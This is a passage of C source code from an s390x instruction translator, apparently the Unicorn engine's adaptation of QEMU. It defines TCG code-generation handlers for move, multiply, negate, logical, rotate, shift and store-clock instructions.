tcg_ctx->cpu_env, o->addr1, o->in2, tcg_ctx->regs[r3]); set_cc_static(s); return DISAS_NEXT; } static DisasJumpType op_mvcp(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int r1 = get_field(s, l1); gen_helper_mvcp(tcg_ctx, tcg_ctx->cc_op, tcg_ctx->cpu_env, tcg_ctx->regs[r1], o->addr1, o->in2); set_cc_static(s); return DISAS_NEXT; } static DisasJumpType op_mvcs(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int r1 = get_field(s, l1); gen_helper_mvcs(tcg_ctx, tcg_ctx->cc_op, tcg_ctx->cpu_env, tcg_ctx->regs[r1], o->addr1, o->in2); set_cc_static(s); return DISAS_NEXT; } static DisasJumpType op_mvn(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 l = tcg_const_i32(tcg_ctx, get_field(s, l1)); gen_helper_mvn(tcg_ctx, tcg_ctx->cpu_env, l, o->addr1, o->in2); tcg_temp_free_i32(tcg_ctx, l); return DISAS_NEXT; } static DisasJumpType op_mvo(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 l = tcg_const_i32(tcg_ctx, get_field(s, l1)); gen_helper_mvo(tcg_ctx, tcg_ctx->cpu_env, l, o->addr1, o->in2); tcg_temp_free_i32(tcg_ctx, l); return DISAS_NEXT; } static DisasJumpType op_mvpg(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; gen_helper_mvpg(tcg_ctx, tcg_ctx->cc_op, tcg_ctx->cpu_env, tcg_ctx->regs[0], o->in1, o->in2); set_cc_static(s); return DISAS_NEXT; } static DisasJumpType op_mvst(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 t1 = tcg_const_i32(tcg_ctx, get_field(s, r1)); TCGv_i32 t2 = tcg_const_i32(tcg_ctx, get_field(s, r2)); gen_helper_mvst(tcg_ctx, tcg_ctx->cc_op, tcg_ctx->cpu_env, t1, t2); tcg_temp_free_i32(tcg_ctx, t1); tcg_temp_free_i32(tcg_ctx, t2); set_cc_static(s); return DISAS_NEXT; } static DisasJumpType op_mvz(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 l = tcg_const_i32(tcg_ctx, get_field(s, l1)); gen_helper_mvz(tcg_ctx, tcg_ctx->cpu_env, l, o->addr1, o->in2); tcg_temp_free_i32(tcg_ctx, l); return DISAS_NEXT; } static DisasJumpType op_mul(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; tcg_gen_mul_i64(tcg_ctx, o->out, o->in1, o->in2); return DISAS_NEXT; } static DisasJumpType op_mul128(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; tcg_gen_mulu2_i64(tcg_ctx, o->out2, o->out, o->in1, o->in2); return DISAS_NEXT; } static DisasJumpType op_meeb(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; gen_helper_meeb(tcg_ctx, o->out, tcg_ctx->cpu_env, o->in1, o->in2); return DISAS_NEXT; } static DisasJumpType op_mdeb(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; gen_helper_mdeb(tcg_ctx, o->out, tcg_ctx->cpu_env, o->in1, o->in2); return DISAS_NEXT; } static DisasJumpType op_mdb(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; gen_helper_mdb(tcg_ctx, o->out, tcg_ctx->cpu_env, o->in1, o->in2); return DISAS_NEXT; } static DisasJumpType op_mxb(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; gen_helper_mxb(tcg_ctx, o->out, tcg_ctx->cpu_env, o->out, o->out2, o->in1, o->in2); return_low128(tcg_ctx, o->out2); return DISAS_NEXT; } static DisasJumpType op_mxdb(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; gen_helper_mxdb(tcg_ctx, o->out, tcg_ctx->cpu_env, o->out, o->out2, o->in2); return_low128(tcg_ctx, o->out2); return DISAS_NEXT; } static DisasJumpType op_maeb(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i64 r3 = load_freg32_i64(tcg_ctx, get_field(s, r3)); gen_helper_maeb(tcg_ctx, o->out, tcg_ctx->cpu_env, o->in1, o->in2, r3); tcg_temp_free_i64(tcg_ctx, r3); return DISAS_NEXT; } static DisasJumpType op_madb(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i64 r3 = load_freg(tcg_ctx, get_field(s, r3)); gen_helper_madb(tcg_ctx, o->out, tcg_ctx->cpu_env, o->in1, o->in2, r3); tcg_temp_free_i64(tcg_ctx, r3); return DISAS_NEXT; } static DisasJumpType op_mseb(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i64 r3 = load_freg32_i64(tcg_ctx, get_field(s, r3)); gen_helper_mseb(tcg_ctx, o->out, tcg_ctx->cpu_env, o->in1, o->in2, r3); tcg_temp_free_i64(tcg_ctx, r3); return DISAS_NEXT; } static DisasJumpType op_msdb(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i64 r3 = load_freg(tcg_ctx, get_field(s, r3)); gen_helper_msdb(tcg_ctx, o->out, tcg_ctx->cpu_env, o->in1, o->in2, r3); tcg_temp_free_i64(tcg_ctx, r3); return DISAS_NEXT; } static DisasJumpType op_nabs(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i64 z, n; z = tcg_const_i64(tcg_ctx, 0); n = tcg_temp_new_i64(tcg_ctx); tcg_gen_neg_i64(tcg_ctx, n, o->in2); tcg_gen_movcond_i64(tcg_ctx, TCG_COND_GE, o->out, o->in2, z, n, o->in2); tcg_temp_free_i64(tcg_ctx, n); tcg_temp_free_i64(tcg_ctx, z); return DISAS_NEXT; } static DisasJumpType op_nabsf32(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; tcg_gen_ori_i64(tcg_ctx, o->out, o->in2, 0x80000000ull); return DISAS_NEXT; } static DisasJumpType op_nabsf64(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; tcg_gen_ori_i64(tcg_ctx, o->out, o->in2, 0x8000000000000000ull); return DISAS_NEXT; } static DisasJumpType op_nabsf128(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; tcg_gen_ori_i64(tcg_ctx, o->out, o->in1, 0x8000000000000000ull); tcg_gen_mov_i64(tcg_ctx, o->out2, o->in2); return DISAS_NEXT; } static DisasJumpType op_nc(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 l = tcg_const_i32(tcg_ctx, get_field(s, l1)); gen_helper_nc(tcg_ctx, tcg_ctx->cc_op, tcg_ctx->cpu_env, l, o->addr1, o->in2); tcg_temp_free_i32(tcg_ctx, l); set_cc_static(s); return DISAS_NEXT; } static DisasJumpType op_neg(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; tcg_gen_neg_i64(tcg_ctx, o->out, o->in2); return DISAS_NEXT; } static DisasJumpType op_negf32(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; tcg_gen_xori_i64(tcg_ctx, o->out, o->in2, 0x80000000ull); return DISAS_NEXT; } static DisasJumpType op_negf64(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; tcg_gen_xori_i64(tcg_ctx, o->out, o->in2, 0x8000000000000000ull); return DISAS_NEXT; } static DisasJumpType op_negf128(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; tcg_gen_xori_i64(tcg_ctx, o->out, o->in1, 0x8000000000000000ull); tcg_gen_mov_i64(tcg_ctx, o->out2, o->in2); return DISAS_NEXT; } static DisasJumpType op_oc(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 l = tcg_const_i32(tcg_ctx, get_field(s, l1)); gen_helper_oc(tcg_ctx, tcg_ctx->cc_op, tcg_ctx->cpu_env, l, o->addr1, o->in2); tcg_temp_free_i32(tcg_ctx, l); set_cc_static(s); return DISAS_NEXT; } static DisasJumpType op_or(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; tcg_gen_or_i64(tcg_ctx, o->out, o->in1, o->in2); return DISAS_NEXT; } static DisasJumpType op_ori(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int shift = s->insn->data & 0xff; int size = s->insn->data >> 8; uint64_t mask = ((1ull << size) - 1) << shift; assert(!o->g_in2); tcg_gen_shli_i64(tcg_ctx, o->in2, o->in2, shift); tcg_gen_or_i64(tcg_ctx, o->out, o->in1, o->in2); /* Produce the CC from only the bits manipulated. */ tcg_gen_andi_i64(tcg_ctx, tcg_ctx->cc_dst, o->out, mask); set_cc_nz_u64(s, tcg_ctx->cc_dst); return DISAS_NEXT; } static DisasJumpType op_oi(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; o->in1 = tcg_temp_new_i64(tcg_ctx); if (!s390_has_feat(s->uc, S390_FEAT_INTERLOCKED_ACCESS_2)) { tcg_gen_qemu_ld_tl(tcg_ctx, o->in1, o->addr1, get_mem_index(s), s->insn->data); } else { /* Perform the atomic operation in memory. */ tcg_gen_atomic_fetch_or_i64(tcg_ctx, o->in1, o->addr1, o->in2, get_mem_index(s), s->insn->data); } /* Recompute also for atomic case: needed for setting CC. */ tcg_gen_or_i64(tcg_ctx, o->out, o->in1, o->in2); if (!s390_has_feat(s->uc, S390_FEAT_INTERLOCKED_ACCESS_2)) { tcg_gen_qemu_st_tl(tcg_ctx, o->out, o->addr1, get_mem_index(s), s->insn->data); } return DISAS_NEXT; } static DisasJumpType op_pack(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 l = tcg_const_i32(tcg_ctx, get_field(s, l1)); gen_helper_pack(tcg_ctx, tcg_ctx->cpu_env, l, o->addr1, o->in2); tcg_temp_free_i32(tcg_ctx, l); return DISAS_NEXT; } static DisasJumpType op_pka(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int l2 = get_field(s, l2) + 1; TCGv_i32 l; /* The length must not exceed 32 bytes. */ if (l2 > 32) { gen_program_exception(s, PGM_SPECIFICATION); return DISAS_NORETURN; } l = tcg_const_i32(tcg_ctx, l2); gen_helper_pka(tcg_ctx, tcg_ctx->cpu_env, o->addr1, o->in2, l); tcg_temp_free_i32(tcg_ctx, l); return DISAS_NEXT; } static DisasJumpType op_pku(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int l2 = get_field(s, l2) + 1; TCGv_i32 l; /* The length must be even and should not exceed 64 bytes. */ if ((l2 & 1) || (l2 > 64)) { gen_program_exception(s, PGM_SPECIFICATION); return DISAS_NORETURN; } l = tcg_const_i32(tcg_ctx, l2); gen_helper_pku(tcg_ctx, tcg_ctx->cpu_env, o->addr1, o->in2, l); tcg_temp_free_i32(tcg_ctx, l); return DISAS_NEXT; } static DisasJumpType op_popcnt(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; gen_helper_popcnt(tcg_ctx, o->out, o->in2); return DISAS_NEXT; } static DisasJumpType op_ptlb(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; gen_helper_ptlb(tcg_ctx, tcg_ctx->cpu_env); return DISAS_NEXT; } static DisasJumpType op_risbg(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int i3 = get_field(s, i3); int i4 = get_field(s, i4); int i5 = get_field(s, i5); int do_zero = i4 & 0x80; uint64_t mask, imask, pmask; int pos, len, rot; /* Adjust the arguments for the specific insn. */ switch (s->fields.op2) { case 0x55: /* risbg */ case 0x59: /* risbgn */ i3 &= 63; i4 &= 63; pmask = ~0; break; case 0x5d: /* risbhg */ i3 &= 31; i4 &= 31; pmask = 0xffffffff00000000ull; break; case 0x51: /* risblg */ i3 &= 31; i4 &= 31; pmask = 0x00000000ffffffffull; break; default: // g_assert_not_reached(); break; } /* MASK is the set of bits to be inserted from R2. Take care for I3/I4 wraparound. */ mask = pmask >> i3; if (i3 <= i4) { mask ^= pmask >> i4 >> 1; } else { mask |= ~(pmask >> i4 >> 1); } mask &= pmask; /* IMASK is the set of bits to be kept from R1. In the case of the high/low insns, we need to keep the other half of the register. */ imask = ~mask | ~pmask; if (do_zero) { imask = ~pmask; } len = i4 - i3 + 1; pos = 63 - i4; rot = i5 & 63; if (s->fields.op2 == 0x5d) { pos += 32; } /* In some cases we can implement this with extract. */ if (imask == 0 && pos == 0 && len > 0 && len <= rot) { tcg_gen_extract_i64(tcg_ctx, o->out, o->in2, 64 - rot, len); return DISAS_NEXT; } /* In some cases we can implement this with deposit. */ if (len > 0 && (imask == 0 || ~mask == imask)) { /* Note that we rotate the bits to be inserted to the lsb, not to the position as described in the PoO. */ rot = (rot - pos) & 63; } else { pos = -1; } /* Rotate the input as necessary. */ tcg_gen_rotli_i64(tcg_ctx, o->in2, o->in2, rot); /* Insert the selected bits into the output. */ if (pos >= 0) { if (imask == 0) { tcg_gen_deposit_z_i64(tcg_ctx, o->out, o->in2, pos, len); } else { tcg_gen_deposit_i64(tcg_ctx, o->out, o->out, o->in2, pos, len); } } else if (imask == 0) { tcg_gen_andi_i64(tcg_ctx, o->out, o->in2, mask); } else { tcg_gen_andi_i64(tcg_ctx, o->in2, o->in2, mask); tcg_gen_andi_i64(tcg_ctx, o->out, o->out, imask); tcg_gen_or_i64(tcg_ctx, o->out, o->out, o->in2); } return DISAS_NEXT; } static DisasJumpType op_rosbg(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int i3 = get_field(s, i3); int i4 = get_field(s, i4); int i5 = get_field(s, i5); uint64_t mask; /* If this is a test-only form, arrange to discard the result. */ if (i3 & 0x80) { o->out = tcg_temp_new_i64(tcg_ctx); o->g_out = false; } i3 &= 63; i4 &= 63; i5 &= 63; /* MASK is the set of bits to be operated on from R2. Take care for I3/I4 wraparound. */ mask = ~0ull >> i3; if (i3 <= i4) { mask ^= ~0ull >> i4 >> 1; } else { mask |= ~(~0ull >> i4 >> 1); } /* Rotate the input as necessary. */ tcg_gen_rotli_i64(tcg_ctx, o->in2, o->in2, i5); /* Operate. */ switch (s->fields.op2) { case 0x54: /* AND */ tcg_gen_ori_i64(tcg_ctx, o->in2, o->in2, ~mask); tcg_gen_and_i64(tcg_ctx, o->out, o->out, o->in2); break; case 0x56: /* OR */ tcg_gen_andi_i64(tcg_ctx, o->in2, o->in2, mask); tcg_gen_or_i64(tcg_ctx, o->out, o->out, o->in2); break; case 0x57: /* XOR */ tcg_gen_andi_i64(tcg_ctx, o->in2, o->in2, mask); tcg_gen_xor_i64(tcg_ctx, o->out, o->out, o->in2); break; default: abort(); } /* Set the CC. */ tcg_gen_andi_i64(tcg_ctx, tcg_ctx->cc_dst, o->out, mask); set_cc_nz_u64(s, tcg_ctx->cc_dst); return DISAS_NEXT; } static DisasJumpType op_rev16(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; tcg_gen_bswap16_i64(tcg_ctx, o->out, o->in2); return DISAS_NEXT; } static DisasJumpType op_rev32(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; tcg_gen_bswap32_i64(tcg_ctx, o->out, o->in2); return DISAS_NEXT; } static DisasJumpType op_rev64(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; tcg_gen_bswap64_i64(tcg_ctx, o->out, o->in2); return DISAS_NEXT; } static DisasJumpType op_rll32(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 t1 = tcg_temp_new_i32(tcg_ctx); TCGv_i32 t2 = tcg_temp_new_i32(tcg_ctx); TCGv_i32 to = tcg_temp_new_i32(tcg_ctx); tcg_gen_extrl_i64_i32(tcg_ctx, t1, o->in1); tcg_gen_extrl_i64_i32(tcg_ctx, t2, o->in2); tcg_gen_rotl_i32(tcg_ctx, to, t1, t2); tcg_gen_extu_i32_i64(tcg_ctx, o->out, to); tcg_temp_free_i32(tcg_ctx, t1); tcg_temp_free_i32(tcg_ctx, t2); tcg_temp_free_i32(tcg_ctx, to); return DISAS_NEXT; } static DisasJumpType op_rll64(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; tcg_gen_rotl_i64(tcg_ctx, o->out, o->in1, o->in2); return DISAS_NEXT; } static DisasJumpType op_rrbe(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; gen_helper_rrbe(tcg_ctx, tcg_ctx->cc_op, tcg_ctx->cpu_env, o->in2); set_cc_static(s); return DISAS_NEXT; } static DisasJumpType op_sacf(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; gen_helper_sacf(tcg_ctx, tcg_ctx->cpu_env, o->in2); /* Addressing mode has changed, so end the block. */ return DISAS_PC_STALE; } static DisasJumpType op_sam(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int sam = s->insn->data; TCGv_i64 tsam; uint64_t mask; switch (sam) { case 0: mask = 0xffffff; break; case 1: mask = 0x7fffffff; break; default: mask = -1; break; } /* Bizarre but true, we check the address of the current insn for the specification exception, not the next to be executed. Thus the PoO documents that Bad Things Happen two bytes before the end. */ if (s->base.pc_next & ~mask) { gen_program_exception(s, PGM_SPECIFICATION); return DISAS_NORETURN; } s->pc_tmp &= mask; tsam = tcg_const_i64(tcg_ctx, sam); tcg_gen_deposit_i64(tcg_ctx, tcg_ctx->psw_mask, tcg_ctx->psw_mask, tsam, 31, 2); tcg_temp_free_i64(tcg_ctx, tsam); /* Always exit the TB, since we (may have) changed execution mode. */ return DISAS_PC_STALE; } static DisasJumpType op_sar(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int r1 = get_field(s, r1); tcg_gen_st32_i64(tcg_ctx, o->in2, tcg_ctx->cpu_env, offsetof(CPUS390XState, aregs[r1])); return DISAS_NEXT; } static DisasJumpType op_seb(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; gen_helper_seb(tcg_ctx, o->out, tcg_ctx->cpu_env, o->in1, o->in2); return DISAS_NEXT; } static DisasJumpType op_sdb(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; gen_helper_sdb(tcg_ctx, o->out, tcg_ctx->cpu_env, o->in1, o->in2); return DISAS_NEXT; } static DisasJumpType op_sxb(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; gen_helper_sxb(tcg_ctx, o->out, tcg_ctx->cpu_env, o->out, o->out2, o->in1, o->in2); return_low128(tcg_ctx, o->out2); return DISAS_NEXT; } static DisasJumpType op_sqeb(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; gen_helper_sqeb(tcg_ctx, o->out, tcg_ctx->cpu_env, o->in2); return DISAS_NEXT; } static DisasJumpType op_sqdb(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; gen_helper_sqdb(tcg_ctx, o->out, tcg_ctx->cpu_env, o->in2); return DISAS_NEXT; } static DisasJumpType op_sqxb(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; gen_helper_sqxb(tcg_ctx, o->out, tcg_ctx->cpu_env, o->in1, o->in2); return_low128(tcg_ctx, o->out2); return DISAS_NEXT; } static DisasJumpType op_servc(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; gen_helper_servc(tcg_ctx, tcg_ctx->cc_op, tcg_ctx->cpu_env, o->in2, o->in1); set_cc_static(s); return DISAS_NEXT; } static DisasJumpType op_sigp(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 r1 = tcg_const_i32(tcg_ctx, get_field(s, r1)); TCGv_i32 r3 = tcg_const_i32(tcg_ctx, get_field(s, r3)); gen_helper_sigp(tcg_ctx, tcg_ctx->cc_op, tcg_ctx->cpu_env, o->in2, r1, r3); set_cc_static(s); tcg_temp_free_i32(tcg_ctx, r1); tcg_temp_free_i32(tcg_ctx, r3); return DISAS_NEXT; } static DisasJumpType op_soc(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; DisasCompare c; TCGv_i64 a, h; TCGLabel *lab; int r1; disas_jcc(s, &c, get_field(s, m3)); /* We want to store when the condition is fulfilled, so branch out when it's not */ c.cond = tcg_invert_cond(c.cond); lab = gen_new_label(tcg_ctx); if (c.is_64) { tcg_gen_brcond_i64(tcg_ctx, c.cond, c.u.s64.a, c.u.s64.b, lab); } else { tcg_gen_brcond_i32(tcg_ctx, c.cond, c.u.s32.a, c.u.s32.b, lab); } free_compare(tcg_ctx, &c); r1 = get_field(s, r1); a = get_address(s, 0, get_field(s, b2), get_field(s, d2)); switch (s->insn->data) { case 1: /* STOCG */ tcg_gen_qemu_st64(tcg_ctx, tcg_ctx->regs[r1], a, get_mem_index(s)); break; case 0: /* STOC */ tcg_gen_qemu_st32(tcg_ctx, tcg_ctx->regs[r1], a, get_mem_index(s)); break; case 2: /* STOCFH */ h = tcg_temp_new_i64(tcg_ctx); tcg_gen_shri_i64(tcg_ctx, h, tcg_ctx->regs[r1], 32); tcg_gen_qemu_st32(tcg_ctx, h, a, get_mem_index(s)); tcg_temp_free_i64(tcg_ctx, h); break; default: // g_assert_not_reached(); break; } tcg_temp_free_i64(tcg_ctx, a); gen_set_label(tcg_ctx, lab); return DISAS_NEXT; } static DisasJumpType op_sla(DisasContext *s, DisasOps *o) { TCGv_i64 t; TCGContext *tcg_ctx = s->uc->tcg_ctx; uint64_t sign = 1ull << s->insn->data; if (s->insn->data == 31) { t = tcg_temp_new_i64(tcg_ctx); tcg_gen_shli_i64(tcg_ctx, t, o->in1, 32); } else { t = o->in1; } gen_op_update2_cc_i64(s, CC_OP_SLA, t, o->in2); if (s->insn->data == 31) { tcg_temp_free_i64(tcg_ctx, t); } tcg_gen_shl_i64(tcg_ctx, o->out, o->in1, o->in2); /* The arithmetic left shift is curious in that it does not affect the sign bit. Copy that over from the source unchanged. */ tcg_gen_andi_i64(tcg_ctx, o->out, o->out, ~sign); tcg_gen_andi_i64(tcg_ctx, o->in1, o->in1, sign); tcg_gen_or_i64(tcg_ctx, o->out, o->out, o->in1); return DISAS_NEXT; } static DisasJumpType op_sll(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; tcg_gen_shl_i64(tcg_ctx, o->out, o->in1, o->in2); return DISAS_NEXT; } static DisasJumpType op_sra(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; tcg_gen_sar_i64(tcg_ctx, o->out, o->in1, o->in2); return DISAS_NEXT; } static DisasJumpType op_srl(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; tcg_gen_shr_i64(tcg_ctx, o->out, o->in1, o->in2); return DISAS_NEXT; } static DisasJumpType op_sfpc(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; gen_helper_sfpc(tcg_ctx, tcg_ctx->cpu_env, o->in2); return DISAS_NEXT; } static DisasJumpType op_sfas(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; gen_helper_sfas(tcg_ctx, tcg_ctx->cpu_env, o->in2); return DISAS_NEXT; } static DisasJumpType op_srnm(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; /* Bits other than 62 and 63 are ignored. Bit 29 is set to zero. */ tcg_gen_andi_i64(tcg_ctx, o->addr1, o->addr1, 0x3ull); gen_helper_srnm(tcg_ctx, tcg_ctx->cpu_env, o->addr1); return DISAS_NEXT; } static DisasJumpType op_srnmb(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; /* Bits 0-55 are are ignored. */ tcg_gen_andi_i64(tcg_ctx, o->addr1, o->addr1, 0xffull); gen_helper_srnm(tcg_ctx, tcg_ctx->cpu_env, o->addr1); return DISAS_NEXT; } static DisasJumpType op_srnmt(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i64 tmp = tcg_temp_new_i64(tcg_ctx); /* Bits other than 61-63 are ignored. */ tcg_gen_andi_i64(tcg_ctx, o->addr1, o->addr1, 0x7ull); /* No need to call a helper, we don't implement dfp */ tcg_gen_ld32u_i64(tcg_ctx, tmp, tcg_ctx->cpu_env, offsetof(CPUS390XState, fpc)); tcg_gen_deposit_i64(tcg_ctx, tmp, tmp, o->addr1, 4, 3); tcg_gen_st32_i64(tcg_ctx, tmp, tcg_ctx->cpu_env, offsetof(CPUS390XState, fpc)); tcg_temp_free_i64(tcg_ctx, tmp); return DISAS_NEXT; } static DisasJumpType op_spm(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; tcg_gen_extrl_i64_i32(tcg_ctx, tcg_ctx->cc_op, o->in1); tcg_gen_extract_i32(tcg_ctx, tcg_ctx->cc_op, tcg_ctx->cc_op, 28, 2); set_cc_static(s); tcg_gen_shri_i64(tcg_ctx, o->in1, o->in1, 24); tcg_gen_deposit_i64(tcg_ctx, tcg_ctx->psw_mask, tcg_ctx->psw_mask, o->in1, PSW_SHIFT_MASK_PM, 4); return DISAS_NEXT; } static DisasJumpType op_ectg(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int b1 = get_field(s, b1); int d1 = get_field(s, d1); int b2 = get_field(s, b2); int d2 = get_field(s, d2); int r3 = get_field(s, r3); TCGv_i64 tmp = tcg_temp_new_i64(tcg_ctx); /* fetch all operands first */ o->in1 = tcg_temp_new_i64(tcg_ctx); tcg_gen_addi_i64(tcg_ctx, o->in1, tcg_ctx->regs[b1], d1); o->in2 = tcg_temp_new_i64(tcg_ctx); tcg_gen_addi_i64(tcg_ctx, o->in2, tcg_ctx->regs[b2], d2); o->addr1 = get_address(s, 0, r3, 0); /* load the third operand into r3 before modifying anything */ tcg_gen_qemu_ld64(tcg_ctx, tcg_ctx->regs[r3], o->addr1, get_mem_index(s)); /* subtract CPU timer from first operand and store in GR0 */ gen_helper_stpt(tcg_ctx, tmp, tcg_ctx->cpu_env); tcg_gen_sub_i64(tcg_ctx, tcg_ctx->regs[0], o->in1, tmp); /* store second operand in GR1 */ tcg_gen_mov_i64(tcg_ctx, tcg_ctx->regs[1], o->in2); tcg_temp_free_i64(tcg_ctx, tmp); return DISAS_NEXT; } static DisasJumpType op_spka(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; tcg_gen_shri_i64(tcg_ctx, o->in2, o->in2, 4); tcg_gen_deposit_i64(tcg_ctx, tcg_ctx->psw_mask, tcg_ctx->psw_mask, o->in2, PSW_SHIFT_KEY, 4); return DISAS_NEXT; } static DisasJumpType op_sske(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; gen_helper_sske(tcg_ctx, tcg_ctx->cpu_env, o->in1, o->in2); return DISAS_NEXT; } static DisasJumpType op_ssm(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; tcg_gen_deposit_i64(tcg_ctx, tcg_ctx->psw_mask, tcg_ctx->psw_mask, o->in2, 56, 8); /* Exit to main loop to reevaluate s390_cpu_exec_interrupt. */ return DISAS_PC_STALE_NOCHAIN; } static DisasJumpType op_stap(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; tcg_gen_ld32u_i64(tcg_ctx, o->out, tcg_ctx->cpu_env, offsetof(CPUS390XState, core_id)); return DISAS_NEXT; } static DisasJumpType op_stck(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; gen_helper_stck(tcg_ctx, o->out, tcg_ctx->cpu_env); /* ??? We don't implement clock states. */ gen_op_movi_cc(s, 0); return DISAS_NEXT; } static DisasJumpType op_stcke(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i64 c1 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 c2 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 todpr = tcg_temp_new_i64(tcg_ctx); gen_helper_stck(tcg_ctx, c1, tcg_ctx->cpu_env); /* 16 bit value store in an uint32_t (only valid bits set) */ tcg_gen_ld32u_i64(tcg_ctx, todpr, tcg_ctx->cpu_env, offsetof(CPUS390XState, todpr)); /* Shift the 64-bit value into its place as a zero-extended 104-bit value. Note that "bit positions 64-103 are always non-zero so that they compare differently to STCK"; we set the least significant bit to 1. */ tcg_gen_shli_i64(tcg_ctx, c2, c1, 56); tcg_gen_shri_i64(tcg_ctx, c1, c1, 8); tcg_gen_ori_i64(tcg_ctx, c2, c2, 0x10000); 